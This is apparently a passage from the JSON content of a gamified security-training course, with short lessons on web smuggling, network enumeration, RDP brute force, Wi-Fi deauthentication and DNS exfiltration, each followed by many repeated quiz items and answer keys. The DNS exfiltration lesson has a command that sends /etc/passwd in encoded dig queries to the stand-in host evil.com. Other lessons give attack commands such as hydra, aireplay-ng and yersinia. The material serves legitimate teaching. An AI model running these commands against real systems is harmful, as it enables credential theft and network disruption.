unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"w-http2-smuggle","cat":"Web Application","title":"HTTP/2 Smuggling","diff":5,"xp":300,"intro":"Exploit HTTP/2 to HTTP/1.1 downgrade for desync.","sections":[{"type":"text","content":"Protocol translation creates request boundary confusion."},{"type":"code","lang":"bash","content":"# H2.CL desync: send oversized body with small CL\n# Back-end reads CL bytes, leftover = next request\npython3 h2csmuggler.py -x https://target.com/ --test"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"HTTP/2 smuggling exploits...","opts":["Encryption","Protocol downgrade translation differences","DNS","Cookies"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"n-ethernet","cat":"Network Attacks","title":"Ethernet Frame Basics","diff":1,"xp":75,"intro":"Understand what's in each frame.","sections":[{"type":"text","content":"Ethernet: dst MAC, src MAC, EtherType, payload, FCS."},{"type":"code","lang":"bash","content":"tcpdump -i eth0 -e -nn\ntshark -i eth0 -T fields -e eth.src -e eth.dst"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Promiscuous mode allows...","opts":["Faster network","Capturing all frames on the segment","Encryption","IP spoofing"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-dhcp-starve","cat":"Network Attacks","title":"DHCP Starvation","diff":2,"xp":150,"intro":"Exhaust available IPs.","sections":[{"type":"text","content":"Send thousands of DHCP discovers with random MACs."},{"type":"code","lang":"bash","content":"yersinia dhcp -attack 1 -interface eth0"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"DHCP starvation denies by...","opts":["Crashing DHCP","Exhausting available IP addresses","DNS poisoning","ARP spoofing"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-smb-enum","cat":"Network Attacks","title":"SMB Enumeration","diff":2,"xp":150,"intro":"Extract users, shares, policies from SMB.","sections":[{"type":"text","content":"Null sessions or guest access reveal user lists and shares."},{"type":"code","lang":"bash","content":"smbclient -L //target -N\nenum4linux -a target\ncrackmapexec smb target --shares"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"SMB null session works when...","opts":["Firewall is down","Anonymous access is enabled","SMB is encrypted","Server rebooted"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-snmp-enum","cat":"Network Attacks","title":"SNMP Exploitation","diff":2,"xp":150,"intro":"Extract system info via SNMP.","sections":[{"type":"text","content":"Default community strings 'public'/'private' are often unchanged."},{"type":"code","lang":"bash","content":"onesixtyone -c community-strings.txt target\nsnmpwalk -v2c -c public target"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"SNMP v1/v2c is insecure because...","opts":["Complex encryption","Community strings sent in cleartext","Too slow","Only local"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-rdp-attack","cat":"Network Attacks","title":"RDP Attack Techniques","diff":2,"xp":150,"intro":"Exploit Remote Desktop Protocol.","sections":[{"type":"text","content":"Brute force, BlueKeep, pass-the-hash with restricted admin."},{"type":"code","lang":"bash","content":"hydra -l admin -P wordlist.txt rdp://target\nnmap -p 3389 --script rdp-vuln-ms12-020 target"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"BlueKeep is dangerous because...","opts":["Requires creds","Pre-auth RCE (no credentials needed)","Only local","Patched everywhere"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-deauth","cat":"Network Attacks","title":"Wireless Deauthentication","diff":2,"xp":150,"intro":"Force clients off WiFi.","sections":[{"type":"text","content":"802.11 management frames are unauthenticated."},{"type":"code","lang":"bash","content":"aireplay-ng -0 10 -a AP_BSSID -c CLIENT_MAC wlan0mon"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Deauth works because...","opts":["WiFi is encrypted","Management frames are unauthenticated","AP is misconfigured","Password is weak"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-dns-exfil","cat":"Network Attacks","title":"DNS Exfiltration","diff":3,"xp":200,"intro":"Encode data in DNS queries.","sections":[{"type":"text","content":"DNS is almost never blocked. Encode chunks in subdomain labels."},{"type":"code","lang":"bash","content":"cat /etc/passwd | base64 | fold -w 60 | while read line; do dig $line.evil.com; done\ndnscat2 evil.com"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"DNS exfil works because...","opts":["DNS is encrypted","DNS traffic is almost never blocked","DNS is fast","DNS uses TCP"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no 